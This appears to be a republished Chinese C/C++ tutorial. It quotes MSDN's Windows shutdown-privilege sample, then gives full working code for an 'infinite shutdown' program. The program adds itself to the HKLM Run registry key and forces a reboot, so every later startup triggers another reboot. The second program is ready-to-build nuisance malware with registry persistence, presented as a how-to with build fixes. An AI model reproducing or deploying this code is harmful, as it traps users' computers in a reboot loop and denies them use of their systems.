Home >Backend Development >C#.Net Tutorial >C/C++ infinite shutdown (privilege escalation example)

C/C++ infinite shutdown (privilege escalation example)

黄舟
黄舟Original
2017-01-22 14:23:261958browse

在windows系统中,当涉及本进程去操作其他进程,或者要用shutdown这些高危命令的时候就涉及提权,下面是MSDN的列子

提权三兄弟
OpenProcessToken
LookupPrivilegevalue
AdjustTokenPrivileges

C/C++ infinite shutdown (privilege escalation example)

我们用下面这个MSDN的代码来做一个注册表无限关机的列子

#include <windows.h>  
  
#pragma comment(lib, "user32.lib")  
#pragma comment(lib, "advapi32.lib")  
  
BOOL MySystemShutdown()  
{  
   HANDLE hToken;   
   TOKEN_PRIVILEGES tkp;   
   
   // Get a token for this process.   
   
   if (!OpenProcessToken(GetCurrentProcess(),   
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))   
      return( FALSE );   
   
   // Get the LUID for the shutdown privilege.   
   
   LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,   
        &tkp.Privileges[0].Luid);   
   
   tkp.PrivilegeCount = 1;  // one privilege to set      
   tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;   
   
   // Get the shutdown privilege for this process.   
   
   AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,   
        (PTOKEN_PRIVILEGES)NULL, 0);   
   
   if (GetLastError() != ERROR_SUCCESS)   
      return FALSE;   
   
   // Shut down the system and force all applications to close.   
   
   if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,   
               SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
               SHTDN_REASON_MINOR_UPGRADE |  
               SHTDN_REASON_FLAG_PLANNED))   
      return FALSE;   
  
   //shutdown was successful  
   return TRUE;  
}

上面是MSDN的代码,下面给出无限关机的代码(含详细注释)

// shutdownDemo.cpp : 定义控制台应用程序的入口点。  
//  
  
#include "stdafx.h"  
#include <windows.h>  
  
BOOL MySystemShutdown()  
{  
    HANDLE hToken;      //用于操作的句柄  
    TOKEN_PRIVILEGES tkp;   //用于存放特定信息  
  
    // Get a token for this process.   
  
    if (!OpenProcessToken(GetCurrentProcess(),  
        TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))  
        return(FALSE);  
  
    // Get the LUID for the shutdown privilege.   
    //如果要提权的话要在下面这两个函数提权  
  
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,  
        &tkp.Privileges[0].Luid);  
  
    tkp.PrivilegeCount = 1;  // one privilege to set      
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;  
  
    // Get the shutdown privilege for this process.       
  
  
    AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,  
        (PTOKEN_PRIVILEGES)NULL, 0);  
  
    if (GetLastError() != ERROR_SUCCESS)  
        return FALSE;  
  
    // Shut down the system and force all applications to close.   
  
    if (!ExitWindowsEx(EWX_REBOOT| EWX_FORCE,  
        SHTDN_REASON_MAJOR_OPERATINGSYSTEM |  
        SHTDN_REASON_MINOR_UPGRADE |  
        SHTDN_REASON_FLAG_PLANNED))  
        return FALSE;  
  
    //shutdown was successful  
    return TRUE;  
}  
  
  
int _tmain(int argc, _TCHAR* argv[])  
{  
    getchar();  
    HKEY hKey = { 0 };  
  
    /*LONG RegOpenKeyEx( 
        HKEY hKey, // 需要打开的主键的名称 
        LPCTSTR lpSubKey, //需要打开的子键的名称 
        DWORD ulOptions, // 保留,设为0 
        REGSAM samDesired, // 安全访问标记,也就是权限 
        PHKEY phkResult // 得到的将要打开键的句柄 
        )*/  
  
    RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_WRITE,&hKey);    //打开一个指定的注册表键  
    char path[MAX_PATH] = { 0 };  
    GetModuleFileNameA(nullptr, path, MAX_PATH);    //获取当前文件路径  
  
    RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));  
    MySystemShutdown();  
    return 0;  
}

如果出现下面问题

C/C++ infinite shutdown (privilege escalation example)

请修改字符集如下

C/C++ infinite shutdown (privilege escalation example)

下面看看运行结果!


C/C++ infinite shutdown (privilege escalation example)

以上就是 C/C++无限关机(提权例子)的内容,更多相关内容请关注PHP中文网(m.sbmmt.com)!

Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn